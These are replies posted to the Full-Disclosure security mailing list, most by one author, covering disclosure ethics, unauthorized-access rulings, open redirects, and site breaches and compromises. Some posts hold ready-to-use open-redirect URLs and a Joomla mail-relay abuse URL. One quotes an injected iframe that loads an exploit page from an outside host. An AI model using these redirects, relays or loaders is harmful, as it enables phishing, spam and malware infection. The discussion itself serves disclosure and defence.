Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution
adam replied to himself: > > The original page has been deleted? > > Screenshot for anyone who might have missed it (before cache is removed): > > http://img842.imageshack.us/img842/7351/sansphpportscannerfdpng.png Or, if you want actual editable content, you could try this thing called the Google cache... Search Google for the original URL: http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/ et voila! Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
Sanguinarious Rose to me: > And that is the reason why no one wants to report anything they find, > it's because of people like you and your kind of thinking. As you seem to have assumed a whole bunch about "my kind of thinking" that I did not put in the original post, I find the above laughable. > Did they public post all the private information? > No Agreed. > Did they try to use it for malious or illicit purposes? > No Not that we know from what seems to be a rather one-sided, self-serving to the victim, "the system screwed poor little me" telling of the story. > Did they report it when they found it? > Yes Agreed. > A horrible moral compass indeed! ... No -- I said nothing about what could or should be considered about their moral compass _in finding_ the problem. I did say they probably broke _both_ school/other ToS agreements and unauthorized access laws, but I did not say what I felt about that. It is often the case that minor transgressions of such nature are necessary in doing many useful things in the computer security domain. That alone makes it precarious territory in which to work and such issues should obviously be front-of-mind for _anyone_ potentially in such territory. > ... Arrest these people for being > concerned and reporting it after stumbling upon security flaws! > Amiright? No, I did not say that either. What you seem to have missed (other than that you are reading things into my previous post that are not there) was that _after_ these two students notified the relevant system owners/operators and/or vendors, apparently only _one_ of them went back and did stuff that he probably should not have originally done (but that we can _probably_ excuse because of a "greater good"), _again_. _That_ is what tells us something critical about _his_ moral compass (either he does not have one, it is rather under-developed for a 20- year old or it is rather broken). Did you notice that this story was not titled "Youths expelled..." "or "Students expelled..." _despite_ the first sentence of any substance in the National Post article starting: Ahmed Al-Khabaz ... was working on a mobile app ... when he and a colleague discovered what he describes as "sloppy coding" in ... Did you notice how the rest of story fails to mention that his colleague was expelled? Poor journalism, missing a fairly major fact in the story? Or perhaps evidence that his "colleague" was not expelled because his colleague did not continue to mess with stuff that he should have (now) known he should not be messing with? If _both_ students had been expelled, surely the tone of indignation and righteousness would have been greater, so I doubt the fact that the article only talks of one student being expelled is due to journalistic oversight... So, Mr Rose, do you now see what you chose to avoid noticing on your first pass through this story and its "clever hacker cruelly ostracized" skew? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
Hi all, Jeffrey Walton to me: > > [...] > > BUT he has no responsibility to check on anyone _else's_ data and no > > _authority_ to use anyone else's credentials to check on his own. > I would argue that's part of testing the system. If I log in and get a > token back, I'm going to try a simple increment (and other > transformations on the token) to see if its predictable. If I happen > to get another's record, that demonstrates the flaw in the system and > not 'testing on behalf of another'. Which may well put you on very thin legal ice. According to at least one legal ruling in Germany, it is "hacking" (as in the negative, illegal kind) to deliberately try to access upper- level directories of _published_ URLs _if_ the specific URLs to those resources have not also been made publicly available, _despite_ that they are necessarily discernible from the published URL. Silly as that may seem, I'm pretty sure that tweaking tokens in cookie values and the like would be equally, if not more, egregious "hacking" in front of that court. > What did he do with the other records he retireived? I suspect he used > them as proof of concept; and did not use them for a work visa or > credit card. But I could be wrong. Indeed, we do not know, but as there is no suggestion that anything further was done with whatever records were "illicitly" accessed, I suspect that nothing is what was done with that data (and it seems likely the heavy-handed legalistic mouthings of the vendor spokespeople would have touched on this if they had any inkling or evidence that such had happened). > > So, what "responsibility" does he really have? > We have the responsibility to protect our own data, because class-A > fuckups like Omnivox don't do it. Once the data is lost, you can't get > it back - the genie is out of the bottle. Sadly, you cannot protect it when it is already in other's hands... It seems that, in general, once you've _en_trusted such data to others our (current) legal system is of the opinion that you have accepted that you _trust_ their ability to maintain its confidentiality, etc. This is not good, but it's also very difficult to see how an individual can really do much _useful_ about that either. A lot of our "technological advances" have come at the cost of a loss of lot of control of confidentiality of information. This is a trade- off that many have probably made without even realizing it, and certainly without realizing the _scale_ of it. > That's coming from a guy who was part of a breach in the 1990s. It > cost me about $10,000 to fix it back then. It started again in the > mid-2000's. I'm not fixing it this time. I'm sorry, for you, to hear this. > > It sounds like he should have left well alone once he had reported this > > to the university and the vendors. That he did not have the sense or > > moral compass to recognize that tells us something important about him. > Does that sword cut both ways? How about Nokia/Opera and their > destrucion of the secure channel? How about Trustwave and their > fraudulent certifcates that destroyed the secure channel? > > Or do these things (law and moral compasses) only apply to individuals? In my previous message I did not address the responsibilities -- nor their common, commonly egregious and often entirely predictable failing of such -- of those holding personal, confidential, etc data. I think my opinion of that part of the industry, in general, is pretty obvious though, from this and many other messages I have posted to public lists like this... Sadly, as I said above, our legal (and perhaps societal) mechanisms have not yet caught up with the implications of our recent (last ~70 years) technological progress in the areas of data processing, retention, sharing and mining. I suspect though, that on balance, it is probably better that such legalistic and societal changes lag such technological advances, but I also suspect we are getting to the point where that gap may be too large and too much power (or too little real responsibility) will end up in the hands of those who clearly should not only be doing more, but should be expected and required to do more. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
Jeffrey Walton wrote: > On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse wrote: > > Moreover, he ran it again after reporting it to see if it was still there. > > Essentially he's doing an unauthorised pen test having alerted them that > > he'd done one already. > If his personal information is in the proprietary system, I believe he > has every right to very the security of the system. BUT how can he "verify" (I assume that was the word you meant?") proper security of _his_ personal details? He would have to test using someone _else's_ access credentials. That is "unauthorized access" by most relevant legislation in most jurisdictions. Alternately, he could try accessing someone else's data from his login, and that is equally clearly unauthorized access. He and his colleague who originally discovered the flaw may have used each other's access credentials to access their own data, or used their own credentials to access the other's data _in agreement between themselves_ BUT in so doing most likely broke the terms of service of the system/their school/etc, _equally_ putting them afoul of most unauthorized access legislation. > Is he allowed to "opt-out" of the system (probably not)? If not, he > has a responsibility to check. BUT he has no resposibility to check on anyone _else's_ data and no _authority_ to use anyone else's credentials to check on his own. So, what "responsibility" does he really have? It sounds like he should have left well alone once he had reported this to the university and the vendors. That he did not have the sense or moral compass to recognize that tells us something important about him. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
Jeffrey Walton wrote: > Sometimes the publisher cannot protect the identity of an anonymous > author. ... That may be true -- I don't know... > ... The real Rex Feral was dragged into court. > > http://en.wikipedia.org/wiki/Hit_Man:_A_Technical_Manual_for_Independent_Contractors ...but that claim is not supported by your reference. The Wikipedia article simply does not address whether the pseudonymous author's real identity was exposed in the legal preceedings or not. Note that the case was "Rice v Paladin Enterprises" and the legal claim was that Paladin (the _publishers_) aided and abetted a murder. Presumably (again, IANAL) they could have brought a similar suit against the author, but saw the publisher as having deeper pockets (and perhaps reasonably assumed, or even knew, that the publisher would have extensive commercial insurance to cover any damages ruling they may receive if their case prevailed). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question regarding script vulnerabilities
Rand wrote: > I was curious, if you have a virtual dedicated server or a dedicated > server, and a reasonably trustworthy hosting service, are malicious scripts > planted by external people a big concern? If so why? If you have a web server, malicious scripts should be a big concern to you, yes. Why would you NOT be concerned that the integrity of your site and the server running it may be compromised? Answering your "why" question is focussing on the wrong issue, as you've rather glibly skipped over a much more important issue -- what is the basis of your assessment that a hosting service is "reasonably trustworthy"? Every site owner/admin on every one of the hundreds of compromised sites I've had dealings with this year alone was (at least before they finally recognized they were hosed) of the opinion that their hosting provider was (at least) "reasonably trustworthy". They were all -- clearly -- wrong _if_ by that assessment they (and presumably you) were of the opinion that a "reasonably trustworthy" hosting provider will not have site/server compromise issues. I have to assume that they are representative of the many, many, many hundreds more site owners/operators who never engaged further with my response to their request for information about why their site was "blacklisted". So, what critical baggage are you hiding inside your assessment that a hosting provider is "reasonably trustworthy"? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype account + IM history hijack vulnerability
Benji wrote: > Oracle attacks? > > See into the future? > Padding oracle attacks? > Oracle SQL injections? You noobs... http://www.drdobbs.com/understanding-oracle-attacks-on-informat/184405917 (Don't get too tied up in the crypto stuff in that article.) klondike's point is that simply monitoring the response of the "user X wants to change their password" web-form tells you whether there is, in fact, a user named "X" on the system. That's kinda obvious from the bash script klondike provided, and I don't do bash... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 93, Issue 11
Scott Miller wrote: > You seem to be assuming that denying a random user access to FB is a > security liability ;>] Indeed -- sounds more like a useful public service... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
Laurelai wrote: > ... really i ask a > simple question on how to avoid state sponsored malware that runs > exclusively on windows platforms and not a single one of you said > anything about using an alternate OS, some of you insisted in fact we > should just lie down and take it. You aren't security experts you are > scam artists. Makes me wonder if you are paid to act this way or if you > all really just didnt consider it. Either answer is pretty chilling. I was trying to keep right out of this one, but... OK -- that was not actually quite what you asked, but as you have now asked it this way, I'll reply to this version of your question. The "state-sponsored malware" you're talking about arose as part of a plan to execute a (more-or-less) targeted attack. That meant that it had to target the OS of the intended victim(s). Not much use writing a brilliant attack against IIS 7 when the target's webserver runs Apache 2.2.21 on some BSD. "Not running Windows", as a general policy to adopt in order to prevent yourself or your organization from potentially feeling the unintended side-effects of some state-sponsored malware "going feral", will likely be about as useful as "not running Windows" as a general policy to avoid malware (under the assumption that likely targets of state- sponsored malware will sample target platforms in roughly the same way that the rest of the population will). As changing the whole of your IT infrastructure, recovering the value of the training, experience, etc of your staff in using that infrastructure, etc, etc, is something that most organizations either have not consdered, or have considered and (mostly) rejected, you will have to show us a major additional increase in risk that state- sponsored malware brings to the table before the ROI of changing IT infrastructure starts to stack up economically. Just tacking the adjective "state-sponsored" in front of the term does not do that (well, except, perhaps, for a few folk at the really mal- adjusted ends of some or other psychiatric spectra). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] STEP Security
> Interweb Re-Engineering Task Force J. Oquendo > Request for Comments 4012012 E-Fensive Security Strategies > Category: Informational > Expires: 2020 Really? You went to all that trouble to do an extended textual version of the funnier, and much more succint: http://www.ranum.com/security/computer_security/papers/a1-firewall/index.html (And which has been around, in slowly evolving form, since sometime in 1994!) Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is my ISP lying or stupid?
And your reason for not considering "both" at all likely, is? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
Andrew Farmer wrote: > Alternatively (also, a more memorable link): > > http://www.internetargument.com/ I think the sentiment in that one is overstated. "Usually" -- really? "Sometimes" maybe... "Aspiring to" -- getting closer... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Ben Bucksch wrote: > Even then, that is not sufficient, as explained in length. No -- what you "explained in length" _and_ seem impervious to understanding, despite a couple of respondents explaining it quite clearly, is that you have chosen to perform ongoing "sensitive" work in an environment where doing so is, at best, represents a highly questionable security stance. _Part_ of what contributes to that questionability is your choice to more-or-less continuously run an application that you should always have known leaks access to the clipboard of what you oddly choose to describe as a "trusted desktop" (odd, because you should know that exposing the host clipboard to the client is common -- in fact, probably the standard default -- functionality of VNC clients). That your chosen/preferred/whatever VNC client does not allow you to turn off, or otherwise modify or monitor this functionality is not a security vulnerability or bug, as you seem intent on portraying it. It may be an undesirable feature (or, more accurately, lack of a feature) but don't you have other VNC clients to choose from? Must you use this particular VNC client? If so and this method of working is so critical to you, should you not choose a different platform for your "trusted desktop" and run a more suitably configurable VNC client? Or, if your sensitive work is really that sensitive, should you not invest in a second machine for remotely monitoring/interacting with the the untrusted, sandboxed applications you need to run, so that they really are securely separated (can we all say "air gap"?) from your more "sensitive" operations? It would not have to be a very heavy-duty machine -- a very low-end netbook style machine, or possibly even a cheap tablet-style device may more than suffice... ... Another part of that questionability is obvious to anyone with nous reading this list... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 83, Issue 21
BMF to Valdis: > > Yes, people *have* been prosecuted for playing "twiddle the URL" games > > before. I'd have to go dig up a cite, but it's happened (hacker was > > basically > > abusing a site's predictable URL scheme). > > Here is one relatively recent incident of "twiddle the URL" which got > someone prosecuted and will be familiar to some here... > > http://simonhunt.wordpress.com/2011/01/19/two-charged-with-data-theft-from-june-10s-att-hack/ That's not really "twiddle-the-URL is hacking" though. They allegedly (cough, splutter!) knowingly and wilfully twiddled a specific URL in a specific way that they had already determined led to the exposure of account details of users other than themselves, et seq. If that is the case they clearly were in breech of all manner of "unauthorized access" laws. That has little to do with true "twiddle- the-URL is hacking". To get a "purer" example of "twiddle-the-URL is hacking", I seem to recall that there was a German case back in the late 90s/very earlier 00s where the court ruled that a trivial act of "URL pruning" -- taking a published URL and removing the tail, and/or traversing back up the directory tree exposed by the _published_ URL -- was an act of "hacking" (I don't recall the exact German legal issue/charge, but am fairly sure it was something other than a trivial/silly (mis-) application of "unauthorized access"). I can't be bothered trying to find a record of that case -- previous attempts last time I recall this issue arising in this list failed -- but I will refer you to a UK case from 2005: http://www.theregister.co.uk/2005/10/06/tsunami_hacker_convicted/ http://www.pmsommer.com/CLCMA1205.pdf Basically, given a URL like http://example.com/?foobar or http://example.com/foobar.php has been published in some way, and http://example.com/ has not, this case suggests that trying to access that second URL is an "unauthorized access" offence. In particular, note from p. 2 of the PDF in the second URL, above: But the prosecution said that Cuthbert must have known the directory traversal was unauthorised. It was this interpretation the court accepted; in effect, overall intent was irrelevant, there were no circumstances in which there was consent for directory traversal. This conviction seems to be pretty widely seen as a trivial/silly mis- application of the UK's Computer Misuse Act "unauthorized access" offence: http://www.legislation.gov.uk/ukpga/1990/18/section/1 There are bound to be other vaguely similar cases in the UK and other jurisdictions. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is Your Online Bank Vulnerable To Currency Rounding Attacks?
adam to Jeffrey Walton to Memory Vandal to Jeffrey Walton: > > >> I believe the term is "arbitrage" (not rounding attacks). > > > > > > Nope: https://en.wikipedia.org/wiki/Arbitrage > > http://www.google.com/?q=currency+arbitrage. *sigh*. > > Plus: > > https://www.google.com/?#q=arbitrage&tbs=dfn:1&fp=1 Now, it may be fashionable to bag ACROS here due to their initially over-zealous description of the likely magnitude of the "binary planting" "vulnerability", BUT did any of you _other than Memory Vandal_ actually read the ACROS blog _at all carefully_? If so _and_ you really understand what arbitrage is, you would recognize that Memory Vandal is right -- this aint arbitrage, at least not as classically understood. Let's look at your own justifications of your incorrect positions... To quote the first result in adam's search: The simultaneous buying and selling of securities, currency, or commodities in different markets or in derivative forms in order to take advantage of differing prices for the same asset To quote the first result from Jeffrey's search: A forex strategy in which a currency trader takes advantage of different spreads offered by brokers for a particular currency pair by making trades. Different spreads for a currency pair imply disparities between the bid and ask prices. Currency arbitrage involves buying and selling currency pairs from different brokers to take advantage of this disparity. For example, two different banks (Bank A and Bank B) offer quotes for the US/EUR currency pair. Bank A sets the rate at 3/2 dollars per euro, and Bank B sets its rate at 4/3 dollars per euro. In currency arbitrage, the trader would take one euro, convert that into dollars with Bank A and then back into euros with Bank B. The end result is that the trader who started with one euro now has 9/8 euro. The trader has made a 1/8 euro profit if trading fees are not taken into account. So, we see that arbitrage involves playing a difference in cross-rates _between two [or more] markets_. As the ACROS folk carefully and clearly point out, _if_ you actually bothered to read the whole article at all closely, the issue they are describing is purely possible due to _the customer_ executing trades at one level of mathematical precision (as provided by the bank) and _the bank_ rounding the payout to the customer to a lesser degree of precision. _If_ the customer is able to take advantage of this situation _at a small enough unit of currency_ the rounding "error" (it's not really an error, but it contributes to what the bank may consider an erroneous or undesirable outcome) will swamp the _loss_ that should be expected in the actual trade (ACROS went to some length to explain that the trade should actually make a loss -- that is, after all, how banks make a profit on currency trades -- _and_ explained the magnitude of this loss -- if you missed that, go read it again). Also, notice that _if you already have USD_ (an entirely likely, even probable situation here) there is only one direction of trading necessary here, so clearly not arbitrage at all. So, adam and Jeffrey, much as you may not be pre-disposed to accept what ACROS might say, you are wrong about this being simple arbitrage and ACROS is correct that it is all about rounding practices and banks trading currencies at different levels of precision from that at which they payout transactions (the latter is typically due to the fact that historically currency is always tracked in whole units of the smallest denomination,or perhaps more accurately, in whole single units of the smallest denominational breakdown -- in NZ, my bank tracks my accounts to the cent, but as NZ's smallest legal tender coin is now 10c, if I cash out an account, they will round the payout to a 10c boundary). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Two other Google open redirects
Riyaz Walikar wrote:
> Here's another open redirect that works.
> https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.bing.com
Nice.
That's a bit like the "backlink" ("bl") one from the settings page on
the mobile page that Google fixed a week or so back after the spammers
had been hammering away at it for a month or more.
> This works as well.
> https://www.google.com/search?btnI&q=http://www.bing.com
That is the very long-known "I'm Feeling Lucky" search open redirector.
http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
Again, the spammers used that for ages, but I was fairly sure that it
had been fixed.
Michal, Tavis -- regression management problems in the Googleplex?
Surely not...
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google open redirect
secure poon wrote: > Problem: > > Google suffers from an open redirect that can be used to trick users into > visiting sites not originating from google.com No -- the real problem here is that Google never learns from these... > Example: > > http://www.google.com/local/add/changeLocale?currentLocation=http://www.bing.com > > http://www.google.com/local/add/changeLocale?currentLocation=http://www.tubgirl.ca Just like all the ones that came before and all the new ones some or other moron at Google will devise tomorrow, next Wednesday, etc, etc. _Open_ URL redirectors are trivially prevented by any vaguely sentient web developer as URL redirectors have NO legitimate use from outside one's own site so should ALWAYS be implemented with Referer checking, ensuring they are not _open_ redirectors... (And yes, that means that URL shorteners _as a group_ have no legitimate use.) Apparently Google's web developers are so stubbornly unable to absorb this simple notion that it has become company policy that officially Google does not care about open redirectors: http://www.google.com/about/corporate/company/rewardprogram.html#url-redirection Notice they do not distinguish between "URL redirectors" (almost necessary in many website designs, including their own) and _open_ redirectors (the work of ignorant web designers who do not care about the reputation of their site/brand/etc). I'd have thought that "good sites" (i.e. "non-evil" ones) would be expected to not want their reputation sullied by the kind of trivially prevented reputation abuse that _open_ URL redirectors provide. But we are talking about Google... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
Will McAfee wrote: > Less funny than yesterday's. Just stop. More predictable than yesterday's. Just stop. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phone Scam
Andy McKnight wrote: > ... A couple of people reported > potentially the same guy calling, 'Paul' from Microsoft Or they're reading from the same script... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla Content Manager 1.5 Mail Fun
Tomm Foo wrote: > This might be old, but I find this interesting enough that Ill share just in > case. Dunno if this specific one is know, but spammers (especially 419'ers) have been abusing these poorly implemented "Email a friend" type functions on web pages for quite some time... > By accident I ran across several sites that allow you to send an email > containing a link to whatever site you please from any sender you choose, > all under the header of a presumably legitimate site. > > An example, > > https://www.1stprioritymortgage.com/index.php?option=com_mailto&tmpl=component&link=aHR0cHM6Ly93d3cuMXN0cHJpb3JpdHltb3J0Z2FnZS5jb20vaW5kZXgucGhwP3ZpZXc9YXJ0aWNsZSZpZD04NCUzQXNpdGUtbWFwJm9wdGlvbj1jb21fY29udGVudCZJdGVtaWQ9OTM= > > (found by clicking the mail button on all the article pages containing this > software) will send the recipient you designate a link to the page you were > viewing. However, by changing the base64 code above to a link of your own > works as well, thus > > https://www.1stprioritymortgage.com/index.php?option=com_mailto&tmpl=component&link=Cmh0dHA6Ly93d3cuZXZpbGdheXNleC5jb20vdmlydXMucGhwPz1sb2wK > > will be sent to the recepient instead. Spoof a legitimate page and you could > easily snag the cluesless plebe into visiting somewhere much more nasty. Of course, that Base64-encoded string need not decode to a URL... You can Base64 encode any message body you desire (length limits not tested) and stick that in as the link parameter to the URL. The server- side processor happily decodes that and adds that text to its own (quite brief in this case) message body. As the sent messages are: Content-Type: text/plain some of the cleverness that other such "Email a friend" forms have (quite unintentionally) allowed with HTML content are not available. Oh, and there is an issue with "+" chars in the Base64-encoded text passed back to the form processor (they get turned into spaces and dropped, as you may expect). A good thing this particular instance has that many others don't is that it tries to prevent multiple addresses being entered via the form, making it somewhat less spammer-friendly (though I've seen many instances where 419's apparently c'n'p the same stuff over and over into the same form, with a different Email address each time or maybe have automated it to do one address at a time). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
Andrew Farmer to ector dulac:
> > Looks suspicious to me
>
> Very. That unescapes to:
>
> document.write(' src="http://innessphoto.com/forum.php?tp=675eafec431b1f72"; width="1"
> height="1" frameborder="0">')
>
> Which loads some amusingly obfuscated JS ...
Really?
That amused you?
Maybe my irony detector is on the blink, but that was very ordinary
several years ago.
> ... which looks like it's
> *supposed* to be a plugin exploit of some sort, but which has no
> real payload. At least, not when I looked.
U -- not what I got at all.
I got a very old, very common multi-exploit script that, if successful,
(that is, if run on a sufficiently old, sufficiently unpatched, system)
would have downloaded and executed a PE that was only just very
recently (a bit less than three hours ago) submitted to VirusTotal,
with these results:
http://www.virustotal.com/file-scan/report.html?id=9a68644038cb4f6a0b3b2057c5cdf5a22898675ebc20baedc601dfc94d9fa3e1-1309914305
Of course, what you get served from any given "exploit script" URL can
vary greatly, from hour-to-hour, GeoIP-to-GeoIP, and equally amongst
apparent browser User-Agents (including OS (OS x vs. Windows vs.
others) and even OS version (XP vs. Vista/Win7), etc), HTTP referer
headers, presence or absense or contents of cookies, and so on and so
forth...
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
Christian Sciberras wrote: > Rather than that, I'd say the dev team is out of sync with the security > team.. Assuming that that may be a reasonable one-sentence encapsulation of how Joomla development is organized... The fact such a sentence can be meaningfully utterred tells us there are major problems _inherent_ in Joomla. The kind of problems that scream "Why would anyone in their right mind use it?" Oh, wait -- it's written in PHP, right... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Absolute Sownage (A concise history of recent Sony hacks)
Georgi to Valdis: > > if you eliminate 95% of the holes, it may be > > *effectively* secure, simply because it isn't worth the attacker's time to > > fight for the other 5% > > wtf? > > if someone has working exploit, the probability of breaking is 100% no matter > what the constant 95% is claimed to be. > > about fighting for 5%: malware like nimbda and code red appear > counterexamples - > i suppose they automatically fought for 100% and got what they could get > (quite above your 5%). So, you're both (kinda) right. Nowadays the big, noisy, obvious, "own the net" type "outbreak" of yesteryear is not the model of choice for your typical cyber-thug (you know, those running virtually all malware these days).. In fact, _avoiding_ exactly that is pretty much top of their list of desiderata. Sure, once upon a time, making a big, fast, splash and owning as much of the net as possible (usually for as trivial a result as possible), was de rigeur. It was pretty much _required_ you operated that way so as to keep ahead of the "anti-bad-guys" updating their defenses to detect, block or otherwise mitigate you. But just as VBA macro viruses were, once (yes, kids, go read your history books!) "the thing", so is "owning the net, big, fast and noisy" no longer the model of choice... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Absolute Sownage (A concise history of recent Sony hacks)
mrx wrote, > I am a little frightened that my web app will be owned and user > credentials exposed. ... Keep that attitude when you are no longer a "noob" web-app developer and the world will be a better place. There are far too many "hack" web coders out there, and the evidence suggests that Sony employs quite a few of them... > ... I have read much on SQL injection, XSS, remote > execution, session hijacking etc. I only think I have all bases > covered, I am not 100% sure. Is there a definitive text/book/white > paper on such matters and if so could someone please let me know > where I can find this? I'm not a web-app expert at all -- I live and work in a niche necessitated by the appalling condition that is "web security" in general (I'm a malware analyst who spends much of my time looking at the stuff the bad guys who break poorly configured servers, poorly configured and/or written web-apps, etc, etc put on those compromised machines to wreak havoc further down the food chain) -- but if you're a web-app developer and do not know about OWASP or what the OWASP "Top 10" is, you're probably a shockingly bad web-app developer (but probably well able to get plenty of work at the likes of Sony). Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New attack vector for sale, firewall bypass
ascii wrote: > ... on Windows one has to resort to > things like debug.exe. OK, so 64-bit systems are dealing to this, but has everyone forgotten .COM files and "executable ASCII"? I mean, with a handle like yours... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Online Base64 Decoder & Encoder with ASCII/Hex Output
SecurityXploded Group wrote: > Here is one of our new online tools, Base64 Decoder & Encoder. Apart > from attractive, easy to use interface, it shows output in both ASCII > & HEX format. Limited to 500 chars input? > It will be more useful for folks who are more involved in crypto stuff. Because of Base64's proven strength and irreversability? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sony: No firewall and no patches
Thor (Hammer of God) wrote: > Maybe they should call that "You don't have to patch" genius! Lol > > http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/ Or, to paraphrase Sony BMG's (then) Global Digital Business President Thomas Hesse*: Most people, I think, don't even know what patch management, threat assessment or a firewall is, so why should _we_ care about them? This group of companies clearly has DNA to prevent them from learning. Maybe a good reaming by the legal system this time will finally penetrate their corporately-ignorant ways? (And yes, somewhat ironically, I am sending this from a Sony laptop...) * http://www.npr.org/templates/story/story.php?storyId=4989260 -- the quote is from around 1:56 in the audio. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Search Feature Exploitation Scenario
Cal Leeming wrote: > Didn't seem to wrok for me: > > http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage > +refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b It certainly did when I first reported that URL back in Sep 2007. A far from exhaustive bit of testing just now shows that it appears that Google is doing a Referer check on just those search terms (not just on the order), as you can do an "I'm feeling Lucky" search _from Google_ for those terms and get auto-redirected to the top search result, but if you just hit one of those search URLs with the IFL flag, you get the search results rather than an auto-redirect. Did you think to try some less well-publicized URL abusing this functionality? I wonder which other (if any) IFL abuse URLs that have been used in spam, scams and such Google blocks? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Search Feature Exploitation Scenario
